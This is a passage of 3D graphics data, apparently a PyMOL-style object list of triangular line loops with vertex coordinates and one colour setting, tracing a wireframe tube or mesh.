VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 16.425, 41.407, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.703, 41.524, 28.730,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.335, 41.202, 28.498,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.620, 41.313, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.392, 40.984, 28.454,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.671, 41.104, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.564, 40.881, 28.341,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.827, 41.019, 28.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 16.749, 40.954, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.996, 41.109, 28.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 16.839, 41.159, 28.176,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 17.080, 41.320, 28.378,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 16.781, 41.377, 28.220,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 17.029, 41.529, 28.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 16.609, 41.479, 28.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.873, 41.614, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 16.703, 41.524, 28.730,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.992, 41.568, 28.987,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.703, 41.524, 28.730,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 16.620, 41.313, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.913, 41.353, 29.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.620, 41.313, 28.763,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 16.671, 41.104, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.956, 41.154, 28.898,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.671, 41.104, 28.683,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 16.827, 41.019, 28.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 17.094, 41.089, 28.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.827, 41.019, 28.537,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 16.996, 41.109, 28.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 17.248, 41.195, 28.593,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 41.109, 28.411,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.080, 41.320, 28.378,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 17.327, 41.410, 28.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.080, 41.320, 28.378,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.029, 41.529, 28.458,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 17.285, 41.608, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.029, 41.529, 28.458,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 16.873, 41.614, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 16.873, 41.614, 28.603,
VERTEX, 17.146, 41.673, 28.853,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 16.992, 41.568, 28.987,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 17.294, 41.550, 29.219,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.992, 41.568, 28.987,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 16.913, 41.353, 29.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 17.219, 41.333, 29.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.913, 41.353, 29.005,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 16.956, 41.154, 28.898,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 17.252, 41.146, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.956, 41.154, 28.898,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.094, 41.089, 28.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 17.373, 41.100, 28.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.094, 41.089, 28.727,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.248, 41.195, 28.593,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.513, 41.220, 28.768,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.248, 41.195, 28.593,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.327, 41.410, 28.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.588, 41.437, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.327, 41.410, 28.575,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.285, 41.608, 28.683,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 17.555, 41.623, 28.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.285, 41.608, 28.683,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.146, 41.673, 28.853,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.146, 41.673, 28.853,
VERTEX, 17.434, 41.670, 29.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 17.294, 41.550, 29.219,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 17.617, 41.481, 29.425,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.294, 41.550, 29.219,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.219, 41.333, 29.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 17.544, 41.264, 29.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.219, 41.333, 29.224,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.252, 41.146, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.566, 41.090, 29.270,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.252, 41.146, 29.094,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.373, 41.100, 28.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.671, 41.061, 29.067,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.373, 41.100, 28.905,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.513, 41.220, 28.768,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.797, 41.195, 28.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 41.220, 28.768,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 17.588, 41.437, 28.763,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.870, 41.412, 28.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.588, 41.437, 28.763,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 17.555, 41.623, 28.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.848, 41.586, 29.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.555, 41.623, 28.893,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 17.434, 41.670, 29.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 17.434, 41.670, 29.082,
VERTEX, 17.743, 41.615, 29.288,
END,
COLOR, 0.000, 0.933, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 17.617, 41.481, 29.425,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.965, 41.372, 29.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.617, 41.481, 29.425,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 17.544, 41.264, 29.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.893, 41.154, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.544, 41.264, 29.418,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 17.566, 41.090, 29.270,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.906, 40.994, 29.421,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.566, 41.090, 29.270,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 17.671, 41.061, 29.067,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.995, 40.984, 29.209,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.671, 41.061, 29.067,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 17.797, 41.195, 28.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 18.108, 41.131, 29.074,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.797, 41.195, 28.930,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 17.870, 41.412, 28.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 18.180, 41.348, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.870, 41.412, 28.937,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 17.848, 41.586, 29.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 18.167, 41.509, 29.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.848, 41.586, 29.085,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 17.743, 41.615, 29.288,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 17.743, 41.615, 29.288,
VERTEX, 18.078, 41.518, 29.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 17.965, 41.372, 29.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 18.345, 41.231, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.965, 41.372, 29.605,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 17.893, 41.154, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 18.274, 41.015, 29.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.893, 41.154, 29.585,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 17.906, 40.994, 29.421,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 18.277, 40.869, 29.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.906, 40.994, 29.421,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 17.995, 40.984, 29.209,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 18.351, 40.880, 29.327,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.995, 40.984, 29.209,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.108, 41.131, 29.074,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 18.453, 41.040, 29.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.108, 41.131, 29.074,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.180, 41.348, 29.094,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 18.523, 41.256, 29.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.180, 41.348, 29.094,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.167, 41.509, 29.258,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 18.521, 41.401, 29.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.167, 41.509, 29.258,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.078, 41.518, 29.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.078, 41.518, 29.470,
VERTEX, 18.447, 41.391, 29.626,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 18.345, 41.231, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 18.763, 41.068, 29.876,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.345, 41.231, 29.756,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 18.274, 41.015, 29.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 18.693, 40.855, 29.826,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.274, 41.015, 29.722,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 18.277, 40.869, 29.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 18.687, 40.727, 29.635,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.277, 40.869, 29.544,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 18.351, 40.880, 29.327,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.747, 40.759, 29.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.351, 40.880, 29.327,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 18.453, 41.040, 29.197,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.838, 40.933, 29.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.453, 41.040, 29.197,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 18.523, 41.256, 29.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.907, 41.146, 29.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.523, 41.256, 29.232,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 18.521, 41.401, 29.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.914, 41.274, 29.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.521, 41.401, 29.409,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 18.447, 41.391, 29.626,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 18.447, 41.391, 29.626,
VERTEX, 18.854, 41.241, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 18.763, 41.068, 29.876,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 19.225, 40.892, 29.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.763, 41.068, 29.876,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 18.693, 40.855, 29.826,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 19.157, 40.684, 29.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.693, 40.855, 29.826,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 18.687, 40.727, 29.635,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 19.143, 40.577, 29.691,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.687, 40.727, 29.635,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 18.747, 40.759, 29.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 19.189, 40.634, 29.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.747, 40.759, 29.416,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 18.838, 40.933, 29.296,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 19.269, 40.822, 29.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.838, 40.933, 29.296,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 18.907, 41.146, 29.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 19.337, 41.030, 29.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.907, 41.146, 29.346,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 18.914, 41.274, 29.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 19.352, 41.137, 29.640,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.914, 41.274, 29.537,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 18.854, 41.241, 29.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 18.854, 41.241, 29.756,
VERTEX, 19.305, 41.080, 29.857,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 19.225, 40.892, 29.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 19.741, 40.713, 30.011,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.225, 40.892, 29.962,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 19.157, 40.684, 29.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 19.677, 40.512, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.157, 40.684, 29.893,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 19.143, 40.577, 29.691,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 19.653, 40.431, 29.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.143, 40.577, 29.691,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 19.189, 40.634, 29.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 19.684, 40.516, 29.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.189, 40.634, 29.473,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 19.269, 40.822, 29.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 19.751, 40.719, 29.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.269, 40.822, 29.368,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 19.337, 41.030, 29.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 19.815, 40.920, 29.502,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.337, 41.030, 29.437,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 19.352, 41.137, 29.640,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 19.839, 41.001, 29.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.352, 41.137, 29.640,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 19.305, 41.080, 29.857,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 19.305, 41.080, 29.857,
VERTEX, 19.808, 40.916, 29.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 19.741, 40.713, 30.011,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 20.256, 40.561, 30.003,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.741, 40.713, 30.011,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 19.677, 40.512, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 20.195, 40.370, 29.891,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.677, 40.512, 29.920,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 19.653, 40.431, 29.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 20.157, 40.315, 29.671,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.653, 40.431, 29.707,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 19.684, 40.516, 29.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 20.166, 40.429, 29.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.684, 40.516, 29.496,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 19.751, 40.719, 29.411,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 20.215, 40.645, 29.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.751, 40.719, 29.411,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 19.815, 40.920, 29.502,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 20.276, 40.836, 29.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.815, 40.920, 29.502,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 19.839, 41.001, 29.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 20.313, 40.890, 29.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.839, 41.001, 29.715,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 19.808, 40.916, 29.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 19.808, 40.916, 29.926,
VERTEX, 20.305, 40.776, 29.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 20.256, 40.561, 30.003,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.737, 40.674, 29.892,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 20.707, 40.450, 29.931,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.256, 40.561, 30.003,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 20.195, 40.370, 29.891,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.707, 40.450, 29.931,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 20.648, 40.269, 29.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.195, 40.370, 29.891,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 20.157, 40.315, 29.671,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.648, 40.269, 29.802,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 20.594, 40.238, 29.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.157, 40.315, 29.671,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.166, 40.429, 29.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.594, 40.238, 29.581,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 20.577, 40.375, 29.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.166, 40.429, 29.472,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.215, 40.645, 29.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.577, 40.375, 29.397,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 20.607, 40.599, 29.358,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.215, 40.645, 29.410,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.276, 40.836, 29.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.607, 40.599, 29.358,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 20.666, 40.780, 29.487,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.276, 40.836, 29.522,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 20.313, 40.890, 29.742,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.666, 40.780, 29.487,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 20.720, 40.811, 29.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.313, 40.890, 29.742,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 20.305, 40.776, 29.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.720, 40.811, 29.708,
VERTEX, 20.305, 40.776, 29.941,
VERTEX, 20.737, 40.674, 29.892,
END,
BEGIN, LINE_LOOP,
